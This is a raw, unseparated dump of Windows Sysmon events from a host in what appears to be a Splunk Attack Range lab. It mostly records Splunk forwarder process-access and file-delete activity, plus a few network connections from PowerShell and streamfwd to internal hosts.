AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035127966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:27.039{B81B27B7-830A-613A-C296-03000000C801}61204024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:28.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3880917419B54A491D9A5B33D55A55C,SHA256=91456405B45ECA16CB575BA6807BA32DDB6585D8DDB653340DD325FEB3B2434D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:29.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DC7D439AF1C7CD9664AF1E4E45ABEFC,SHA256=A365D42D9F4A2DA7F4F201F09858E0B003E845F98C0AB2B7A0BC00D5BE773F45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:29.490{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=297071562B50FD13FE3B4BE7F17AD883,SHA256=DF4DADC4CF6EA2468F4953481E9F11A2BDAFAC60857314BD508B742405391B4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:30.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45E5F310E6ECD53D34EB5081F43A9705,SHA256=510EC1C9649CBF3646F16393996923988CFE4007283973C43D8724F4ABBD3F0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:54.466{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62094-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:32.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=710AA14430C2ABED62D105D48C9888E5,SHA256=E4A0A30EEA1F3697046E7C31C98777E4A34E614ADBB8972C6C6F34C01F4F5E5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035127986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:56:33.681{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5c5-0x8dcbf3b8) 23542300x800000000000000035127985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:33.019{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5C81CE902BCBA388F18849E1B54E4E,SHA256=1093A19CF7D86A68A797C5BE4551999DC499020D45170E7B63823A818377BF0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:58.284{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62095-false10.0.1.12-8000- 23542300x800000000000000035127987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:34.049{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A29FF226B7546F1B9E090A355432965,SHA256=E660E66D27ABE9AE2ABBAF6D9ADC470C925A422915D5A2435774ACBFC4E3CB8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:35.316{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=53F7F0475C4CBB330FC9610864D163B4,SHA256=4E6361C1951F331E573DAC2351D03668848B47DB1FDCD774E25851A02F752D73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:35.063{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A193A335550FAF1043DE42906377107A,SHA256=147BBC65C04A9CE2D078AD2E7203CCF30179125DC95AAF2F7D60526C72D41360,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:36.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D413652B2E20BAA2438F47D7C289C5,SHA256=E37197DA94EA6D8AF8C1D329609C481CDBEE8E5356FC9F96DF3ECFF684EBBC26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:37.981{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=48F685C41522C928870E0AA23A778576,SHA256=F307DA35983FC00474A0DE7EEC63EFD72EC0BC347FD8FBD149BB842181DD8CFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:37.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E46C20EE4774C35E152A99BC092AA9,SHA256=3A0DD281D85E51541F55376C79C6D68ED6E7ECE18A79618ADE892380FFA3BFDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:00.483{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62096-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:38.163{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4E6FD91E6CF4543C82224D6EE369CDE,SHA256=280C5EB87836E64D93D418AE77CC277644C81377D98ADC59C5F68180AFB1B30D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:39.181{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60BF76A02DAB9980D20FCE936BFA51E,SHA256=03BD81CE07F288F21034FCE8ECC1F0FDE7C36A0F1684591F4B93C8BF779C2E51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:03.360{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62097-false10.0.1.12-8000- 10341000x800000000000000035128008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.698{B81B27B7-8318-613A-C496-03000000C801}15842872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8318-613A-C496-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8318-613A-C496-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.514{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8318-613A-C496-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.499{B81B27B7-8318-613A-C496-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.345{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E7BA08CF7D1410CC61ACA9600074E7B,SHA256=D25F51C76BAB4C70FB84CB98A5D780946D646417DBC7E15B4689DD1828764F5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:40.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB5CF1F8D593F65E1993200A68977B79,SHA256=FBD05762A548C590345EADD890EB333600CE425429F0777E50CC4B0FD18A6114,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8319-613A-C696-03000000C801}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8319-613A-C696-03000000C801}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.912{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8319-613A-C696-03000000C801}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 